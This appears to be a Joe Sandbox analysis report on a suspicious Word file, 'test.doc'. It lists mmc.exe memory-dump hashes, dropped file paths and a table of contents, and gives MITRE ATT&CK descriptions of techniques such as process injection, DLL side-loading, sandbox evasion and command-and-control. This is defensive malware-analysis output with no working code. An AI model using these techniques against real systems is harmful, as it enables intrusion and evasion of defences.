Source File: 0000001A.00000002.1538838687.0000000003C70000.00000010.00000800.00020000.00000000.sdmp, Offset: 03C70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_3c70000_mmc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 72ee81b88a856a5b8792f03b1b95a003c1ca23df02401e42088910152dc52d5f
Instruction ID: 01585f5d303b876af7e78f71be005d6b8ecc6e11b8796355df8db61974755866
Opcode Fuzzy Hash: 72ee81b88a856a5b8792f03b1b95a003c1ca23df02401e42088910152dc52d5f
Instruction Fuzzy Hash:

Analysis Process: mmc.exePID: 3576, Parent PID: 3624COMMON

Executed Functions

Function 04400F91 Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001C.00000002.1545166669.0000000004400000.00000010.00000800.00020000.00000000.sdmp, Offset: 04400000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_4400000_mmc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 72ee81b88a856a5b8792f03b1b95a003c1ca23df02401e42088910152dc52d5f
Instruction ID: 3fcd4e7c80205e5bd58193eccbc3417462e9307d38ace0deb184dc099f072d59
Opcode Fuzzy Hash: 72ee81b88a856a5b8792f03b1b95a003c1ca23df02401e42088910152dc52d5f
Instruction Fuzzy Hash:

Function 04400F99 Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001C.00000002.1545166669.0000000004400000.00000010.00000800.00020000.00000000.sdmp, Offset: 04400000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_4400000_mmc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 72ee81b88a856a5b8792f03b1b95a003c1ca23df02401e42088910152dc52d5f
Instruction ID: 3fcd4e7c80205e5bd58193eccbc3417462e9307d38ace0deb184dc099f072d59
Opcode Fuzzy Hash: 72ee81b88a856a5b8792f03b1b95a003c1ca23df02401e42088910152dc52d5f
Instruction Fuzzy Hash:

Function 04080F99 Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001C.00000003.715746341.0000000004080000.00000010.00000800.00020000.00000000.sdmp, Offset: 04080000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_3_4080000_mmc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e0901e968e2741f1c925d864470624e459c39a6dd1a3a093616f0dca7dc7d249
Instruction ID: 054c0d896125e05004adcc90aed8cfc261fdf18a01a0ab9f5fa5ce3bcddec569
Opcode Fuzzy Hash: e0901e968e2741f1c925d864470624e459c39a6dd1a3a093616f0dca7dc7d249
Instruction Fuzzy Hash:

Function 04080F91 Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001C.00000003.715746341.0000000004080000.00000010.00000800.00020000.00000000.sdmp, Offset: 04080000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_3_4080000_mmc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e0901e968e2741f1c925d864470624e459c39a6dd1a3a093616f0dca7dc7d249
Instruction ID: 054c0d896125e05004adcc90aed8cfc261fdf18a01a0ab9f5fa5ce3bcddec569
Opcode Fuzzy Hash: e0901e968e2741f1c925d864470624e459c39a6dd1a3a093616f0dca7dc7d249
Instruction Fuzzy Hash:

Function 04080FB9 Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001C.00000003.715746341.0000000004080000.00000010.00000800.00020000.00000000.sdmp, Offset: 04080000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_3_4080000_mmc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e0901e968e2741f1c925d864470624e459c39a6dd1a3a093616f0dca7dc7d249
Instruction ID: 054c0d896125e05004adcc90aed8cfc261fdf18a01a0ab9f5fa5ce3bcddec569
Opcode Fuzzy Hash: e0901e968e2741f1c925d864470624e459c39a6dd1a3a093616f0dca7dc7d249
Instruction Fuzzy Hash:

Analysis Process: mmc.exePID: 1860, Parent PID: 3624COMMON

Executed Functions

Function 043E0FA9 Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001E.00000002.1545049537.00000000043E0000.00000010.00000800.00020000.00000000.sdmp, Offset: 043E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_43e0000_mmc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1634a2d688d49a259143009c50f36abdfda0d9cf4fcfe9a0a55bebbf17c78759
Instruction ID: 5805be83608a8cedd858d95db9ab9710ae757ae23db3cad1a8170ac2f645e6eb
Opcode Fuzzy Hash: 1634a2d688d49a259143009c50f36abdfda0d9cf4fcfe9a0a55bebbf17c78759
Instruction Fuzzy Hash:

Function 043E0F99 Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001E.00000002.1545049537.00000000043E0000.00000010.00000800.00020000.00000000.sdmp, Offset: 043E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_43e0000_mmc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1634a2d688d49a259143009c50f36abdfda0d9cf4fcfe9a0a55bebbf17c78759
Instruction ID: 5805be83608a8cedd858d95db9ab9710ae757ae23db3cad1a8170ac2f645e6eb
Opcode Fuzzy Hash: 1634a2d688d49a259143009c50f36abdfda0d9cf4fcfe9a0a55bebbf17c78759
Instruction Fuzzy Hash:

Function 043E0F91 Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001E.00000002.1545049537.00000000043E0000.00000010.00000800.00020000.00000000.sdmp, Offset: 043E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_43e0000_mmc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1634a2d688d49a259143009c50f36abdfda0d9cf4fcfe9a0a55bebbf17c78759
Instruction ID: 5805be83608a8cedd858d95db9ab9710ae757ae23db3cad1a8170ac2f645e6eb
Opcode Fuzzy Hash: 1634a2d688d49a259143009c50f36abdfda0d9cf4fcfe9a0a55bebbf17c78759
Instruction Fuzzy Hash:

Function 04310FB9 Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001E.00000003.731907634.0000000004310000.00000010.00000800.00020000.00000000.sdmp, Offset: 04310000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_3_4310000_mmc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a7746c4fcd792058dff34b208f858b26d0e20ac4c0d4ae1df23727354e10d21e
Instruction ID: 5757185db331e8b88f0efd0d6eba9c6cc04a741ec0137de86b29164014065ac9
Opcode Fuzzy Hash: a7746c4fcd792058dff34b208f858b26d0e20ac4c0d4ae1df23727354e10d21e
Instruction Fuzzy Hash:

Analysis Process: mmc.exePID: 3464, Parent PID: 3624COMMON

Executed Functions

Function 02CD0F99 Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.1539229807.0000000002CD0000.00000010.00000800.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_2cd0000_mmc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e0901e968e2741f1c925d864470624e459c39a6dd1a3a093616f0dca7dc7d249
Instruction ID: ddeea59720794d5afe9eae3dc2319f6bfb28ff43c2a0033205c7d2fb49462d5f
Opcode Fuzzy Hash: e0901e968e2741f1c925d864470624e459c39a6dd1a3a093616f0dca7dc7d249
Instruction Fuzzy Hash:

Function 02CD0F91 Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.1539229807.0000000002CD0000.00000010.00000800.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_2cd0000_mmc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e0901e968e2741f1c925d864470624e459c39a6dd1a3a093616f0dca7dc7d249
Instruction ID: ddeea59720794d5afe9eae3dc2319f6bfb28ff43c2a0033205c7d2fb49462d5f
Opcode Fuzzy Hash: e0901e968e2741f1c925d864470624e459c39a6dd1a3a093616f0dca7dc7d249
Instruction Fuzzy Hash:

Function 02CD0FA9 Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.1539229807.0000000002CD0000.00000010.00000800.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_2cd0000_mmc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e0901e968e2741f1c925d864470624e459c39a6dd1a3a093616f0dca7dc7d249
Instruction ID: ddeea59720794d5afe9eae3dc2319f6bfb28ff43c2a0033205c7d2fb49462d5f
Opcode Fuzzy Hash: e0901e968e2741f1c925d864470624e459c39a6dd1a3a093616f0dca7dc7d249
Instruction Fuzzy Hash:

Function 02B80FB9 Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000003.761492872.0000000002B80000.00000010.00000800.00020000.00000000.sdmp, Offset: 02B80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_3_2b80000_mmc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a7746c4fcd792058dff34b208f858b26d0e20ac4c0d4ae1df23727354e10d21e
Instruction ID: 6ae847a0bbe197258a3eb17339fa6bc20db5958ad7cb607b9a27e163c5366175
Opcode Fuzzy Hash: a7746c4fcd792058dff34b208f858b26d0e20ac4c0d4ae1df23727354e10d21e
Instruction Fuzzy Hash:

Analysis Process: mmc.exePID: 3784, Parent PID: 3624COMMON

Executed Functions

Function 04440F91 Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000022.00000002.1545774206.0000000004440000.00000010.00000800.00020000.00000000.sdmp, Offset: 04440000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_4440000_mmc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 72ee81b88a856a5b8792f03b1b95a003c1ca23df02401e42088910152dc52d5f
Instruction ID: db48005864477bbda82a2b26ef7261c25fa1f591f6937272b498ef7a20314238
Opcode Fuzzy Hash: 72ee81b88a856a5b8792f03b1b95a003c1ca23df02401e42088910152dc52d5f
Instruction Fuzzy Hash:

Function 04440F99 Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000022.00000002.1545774206.0000000004440000.00000010.00000800.00020000.00000000.sdmp, Offset: 04440000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_4440000_mmc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 72ee81b88a856a5b8792f03b1b95a003c1ca23df02401e42088910152dc52d5f
Instruction ID: db48005864477bbda82a2b26ef7261c25fa1f591f6937272b498ef7a20314238
Opcode Fuzzy Hash: 72ee81b88a856a5b8792f03b1b95a003c1ca23df02401e42088910152dc52d5f
Instruction Fuzzy Hash:

Function 04440FA9 Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000022.00000002.1545774206.0000000004440000.00000010.00000800.00020000.00000000.sdmp, Offset: 04440000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_4440000_mmc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 72ee81b88a856a5b8792f03b1b95a003c1ca23df02401e42088910152dc52d5f
Instruction ID: db48005864477bbda82a2b26ef7261c25fa1f591f6937272b498ef7a20314238
Opcode Fuzzy Hash: 72ee81b88a856a5b8792f03b1b95a003c1ca23df02401e42088910152dc52d5f
Instruction Fuzzy Hash:

Function 04440FB9 Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000022.00000002.1545774206.0000000004440000.00000010.00000800.00020000.00000000.sdmp, Offset: 04440000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_4440000_mmc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 72ee81b88a856a5b8792f03b1b95a003c1ca23df02401e42088910152dc52d5f
Instruction ID: db48005864477bbda82a2b26ef7261c25fa1f591f6937272b498ef7a20314238
Opcode Fuzzy Hash: 72ee81b88a856a5b8792f03b1b95a003c1ca23df02401e42088910152dc52d5f
Instruction Fuzzy Hash:

Analysis Process: mmc.exePID: 3872, Parent PID: 3624COMMON

Executed Functions

Function 04440F91 Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000024.00000002.1544384322.0000000004440000.00000010.00000800.00020000.00000000.sdmp, Offset: 04440000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_4440000_mmc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 72ee81b88a856a5b8792f03b1b95a003c1ca23df02401e42088910152dc52d5f
Instruction ID: db48005864477bbda82a2b26ef7261c25fa1f591f6937272b498ef7a20314238
Opcode Fuzzy Hash: 72ee81b88a856a5b8792f03b1b95a003c1ca23df02401e42088910152dc52d5f
Instruction Fuzzy Hash:

Function 04440F99 Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000024.00000002.1544384322.0000000004440000.00000010.00000800.00020000.00000000.sdmp, Offset: 04440000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_4440000_mmc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 72ee81b88a856a5b8792f03b1b95a003c1ca23df02401e42088910152dc52d5f
Instruction ID: db48005864477bbda82a2b26ef7261c25fa1f591f6937272b498ef7a20314238
Opcode Fuzzy Hash: 72ee81b88a856a5b8792f03b1b95a003c1ca23df02401e42088910152dc52d5f
Instruction Fuzzy Hash:

Function 04280FB9 Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000024.00000003.809404294.0000000004280000.00000010.00000800.00020000.00000000.sdmp, Offset: 04280000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_3_4280000_mmc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a7746c4fcd792058dff34b208f858b26d0e20ac4c0d4ae1df23727354e10d21e
Instruction ID: b7f980c7b5fba0be6f59108c27dc6df59f81921bbdca6dab577c688894ca9288
Opcode Fuzzy Hash: a7746c4fcd792058dff34b208f858b26d0e20ac4c0d4ae1df23727354e10d21e
Instruction Fuzzy Hash:

Function 04280F99 Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000024.00000003.809404294.0000000004280000.00000010.00000800.00020000.00000000.sdmp, Offset: 04280000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_3_4280000_mmc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a7746c4fcd792058dff34b208f858b26d0e20ac4c0d4ae1df23727354e10d21e
Instruction ID: b7f980c7b5fba0be6f59108c27dc6df59f81921bbdca6dab577c688894ca9288
Opcode Fuzzy Hash: a7746c4fcd792058dff34b208f858b26d0e20ac4c0d4ae1df23727354e10d21e
Instruction Fuzzy Hash:

Function 04280F91 Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000024.00000003.809404294.0000000004280000.00000010.00000800.00020000.00000000.sdmp, Offset: 04280000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_3_4280000_mmc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a7746c4fcd792058dff34b208f858b26d0e20ac4c0d4ae1df23727354e10d21e
Instruction ID: b7f980c7b5fba0be6f59108c27dc6df59f81921bbdca6dab577c688894ca9288
Opcode Fuzzy Hash: a7746c4fcd792058dff34b208f858b26d0e20ac4c0d4ae1df23727354e10d21e
Instruction Fuzzy Hash:

Analysis Process: mmc.exePID: 4060, Parent PID: 3624COMMON

Executed Functions

Function 02950F91 Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000026.00000002.1536477224.0000000002950000.00000010.00000800.00020000.00000000.sdmp, Offset: 02950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_2950000_mmc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 72ee81b88a856a5b8792f03b1b95a003c1ca23df02401e42088910152dc52d5f
Instruction ID: 97db126d3f56b2ac21e49ad1b98eaf45512690a3b5ea74c8a7c933c9d8e28c3f
Opcode Fuzzy Hash: 72ee81b88a856a5b8792f03b1b95a003c1ca23df02401e42088910152dc52d5f
Instruction Fuzzy Hash:

Function 02950F99 Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000026.00000002.1536477224.0000000002950000.00000010.00000800.00020000.00000000.sdmp, Offset: 02950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_2950000_mmc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 72ee81b88a856a5b8792f03b1b95a003c1ca23df02401e42088910152dc52d5f
Instruction ID: 97db126d3f56b2ac21e49ad1b98eaf45512690a3b5ea74c8a7c933c9d8e28c3f
Opcode Fuzzy Hash: 72ee81b88a856a5b8792f03b1b95a003c1ca23df02401e42088910152dc52d5f
Instruction Fuzzy Hash:

Function 02950FA9 Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000026.00000002.1536477224.0000000002950000.00000010.00000800.00020000.00000000.sdmp, Offset: 02950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_2950000_mmc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 72ee81b88a856a5b8792f03b1b95a003c1ca23df02401e42088910152dc52d5f
Instruction ID: 97db126d3f56b2ac21e49ad1b98eaf45512690a3b5ea74c8a7c933c9d8e28c3f
Opcode Fuzzy Hash: 72ee81b88a856a5b8792f03b1b95a003c1ca23df02401e42088910152dc52d5f
Instruction Fuzzy Hash:

Function 02890FB9 Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000026.00000003.825271758.0000000002890000.00000010.00000800.00020000.00000000.sdmp, Offset: 02890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_3_2890000_mmc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a7746c4fcd792058dff34b208f858b26d0e20ac4c0d4ae1df23727354e10d21e
Instruction ID: 29008aab73a2e0d59e06effafcc39236ac62b1ceb3f8633c13798d7c77d9ea12
Opcode Fuzzy Hash: a7746c4fcd792058dff34b208f858b26d0e20ac4c0d4ae1df23727354e10d21e
Instruction Fuzzy Hash:

Description:	Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Application Log: Application Log Content, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to hide configuration information within Registry keys, remove information as part of cleaning up, or as part of other techniques to aid in persistence and execution.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may install a root certificate on a compromised system to avoid warnings when connecting to adversary controlled web servers. Root certificates are used in public key cryptography to identify a root certificate authority (CA). When a root certificate is installed, the system or application will trust certificates in the root's chain of trust that have been signed by the root certificate.Certificates are commonly used for establishing secure TLS/SSL communications within a web browser. When a user attempts to browse a website that presents a certificate that is not trusted an error message will be displayed to warn the user of the security risk. Depending on the security settings, the browser may not allow the user to establish a connection to the website.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of open application windows. Window listings could convey information about how the system is used.For example, information about application windows could be used identify potential data to collect as well as identifying security tooling ( Security Software Discovery ) to evade.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an existing, legitimate external Web service as a means for relaying data to/from a compromised system. Popular websites and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report test.doc

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Initial Sample

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Exploits

Compliance

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\JtdAmHD5[1].txt

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\views[1]

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\views[1]

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\views[1]

C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm

C:\Users\user\Desktop\~$test.doc

Static File Info

General

File Icon

Static RTF Info

Objects

Network Behavior

Suricata IDS Alerts

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

HTTP Request Dependency Graph

Windows Analysis Report
test.doc